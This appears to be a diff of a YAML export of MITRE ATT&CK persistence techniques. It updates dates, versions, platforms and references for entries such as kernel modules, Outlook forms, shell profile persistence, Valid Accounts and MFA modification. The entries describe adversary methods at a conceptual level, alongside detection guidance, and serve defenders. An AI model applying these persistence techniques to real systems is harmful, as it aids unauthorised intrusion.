-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -33183,7 +33606,7 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -33209,12 +33632,10 @@ persistence:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -33292,9 +33713,8 @@ persistence:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1542.004:
@@ -33321,7 +33741,7 @@ persistence:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -33343,41 +33763,10 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
-      type: attack-pattern
-      created: '2019-11-07T20:06:02.624Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.003
-        url: https://attack.mitre.org/techniques/T1137/003
-      - source_name: SensePost Outlook Forms
-        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
-        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
-          February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:00.782Z'
       name: Outlook Forms
       description: |-
         Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -33386,22 +33775,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+      created: '2019-11-07T20:06:02.624Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/003
+        external_id: T1137.003
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Forms
+        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+          February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574:
     technique:
@@ -33467,7 +33883,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -33541,11 +33956,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33562,7 +33976,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -33572,7 +33985,7 @@ persistence:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33581,19 +33994,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -33641,11 +34052,12 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33674,24 +34086,26 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -33726,9 +34140,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1505.004:
     technique:
@@ -33788,7 +34199,7 @@ persistence:
         description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
           on Targets in the Middle East. Retrieved July 6, 2018.
         source_name: Unit 42 RGDoor Jan 2018
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:06:24.161Z'
       name: IIS Components
       description: |-
         Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -33813,13 +34224,11 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.004
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -33872,8 +34281,8 @@ persistence:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -33921,78 +34330,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -34040,6 +34382,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -34050,9 +34396,13 @@ persistence:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -34061,8 +34411,67 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1547.002:
@@ -34099,7 +34508,7 @@ persistence:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
